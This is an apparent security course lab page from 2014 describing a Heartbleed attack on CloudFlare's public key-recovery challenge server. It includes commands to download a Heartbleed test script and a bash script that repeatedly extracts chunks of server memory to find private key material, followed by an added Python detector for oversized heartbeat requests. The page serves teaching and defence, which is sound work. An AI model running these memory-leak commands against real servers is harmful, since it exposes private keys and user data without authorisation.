Attacking the CloudFlare Challenge Server with Heartbleed

Wow! The Key is Easy to Find!

The challenge was solved, and after Kevin (a CCSF student) showed me his solution, I tried it and it was very easy to find large parts of the key in just 100 requests, as shown below.

HOWEVER--It occurs to me that there is a simple explanation. I don't think we are really finding the original key--we are finding the RAM used by the real winner when he submitted the key.

What You Need

Get the Python Heartbleed Test Source Code

In a Terminal window, execute these commands:
cd
wget http://samsclass.info/120/proj/hb1.pyx
mv hb1.pyx hb1.py

Make a Script

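In a text editor, open a file named attack-cloudflare and paste in this script:
#!/bin/bash
# Run the test script and save everything it prints
python hb1.py www.cloudflarechallenge.com > /tmp/attackcf0
# Drop the last two lines of output and keep the 1024 lines before them
tail -n 1026 /tmp/attackcf0 | head -n 1024 > /tmp/attackcf1
# Keep only characters 58-73 (16 characters) of each line
cut -c 58-73 /tmp/attackcf1 > /tmp/attackcf2
# Join the lines together, then delete every '.' character
tr -d '\n' < /tmp/attackcf2 > /tmp/attackcf3
tr -d '.' < /tmp/attackcf3 > /tmp/attackcf4
cat /tmp/attackcf4
Make it executable with this command:
chmod a+x attack-cloudflare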

Each time you execute that script, it will grab a random chunk of RAM from CloudFlare's server.
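For the defender's side of the requests this script sends, here is an added example (not part of the original page or of hb1.py) that flags TLS heartbeat requests whose declared payload length is larger than the record that carries it, following the record layout in RFC 6520. It assumes the heartbeat record is captured unencrypted; the function name and the sample records are constructed for illustration.

```python
import struct

TLS_HEARTBEAT = 24    # TLS record content type for heartbeat (RFC 6520)
HB_REQUEST = 1        # heartbeat_request message type
MIN_PADDING = 16      # RFC 6520 requires at least 16 bytes of padding


def check_heartbeat_record(record: bytes) -> str:
    """Classify one raw TLS record (hypothetical helper).

    Returns 'truncated', 'not-heartbeat', 'ok' or 'suspicious'.
    """
    if len(record) < 5:
        return "truncated"
    ctype, _version, rec_len = struct.unpack("!BHH", record[:5])
    if ctype != TLS_HEARTBEAT:
        return "not-heartbeat"
    body = record[5:5 + rec_len]
    if len(body) < rec_len:
        return "truncated"
    if rec_len < 3:
        # Too short to hold the type byte and the 2-byte payload length
        return "suspicious"
    hb_type, payload_len = struct.unpack("!BH", body[:3])
    if hb_type != HB_REQUEST:
        return "ok"
    # A well-formed request carries header + payload + padding inside the record
    if 3 + payload_len + MIN_PADDING > rec_len:
        return "suspicious"
    return "ok"


def build_record(ctype: int, body: bytes) -> bytes:
    """Wrap a body in a TLS 1.1 record header (constructed test data only)."""
    return struct.pack("!BHH", ctype, 0x0302, len(body)) + body


# Constructed samples: a request claiming 16384 payload bytes in a 3-byte record,
# a well-formed request with a 4-byte payload, and a handshake record.
SAMPLE_OVERSIZED = build_record(24, struct.pack("!BH", 1, 0x4000))
SAMPLE_WELL_FORMED = build_record(24, struct.pack("!BH", 1, 4) + b"ping" + bytes(16))
SAMPLE_HANDSHAKE = build_record(22, b"\x01\x00\x00\x00")

if __name__ == "__main__":
    for name in ("SAMPLE_OVERSIZED", "SAMPLE_WELL_FORMED", "SAMPLE_HANDSHAKE"):
        print(name, check_heartbeat_record(globals()[name]))
```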


Posted 4-11-14 1:38 pm by Sam Bowne
Solution video added 4-11-14 6:15 pm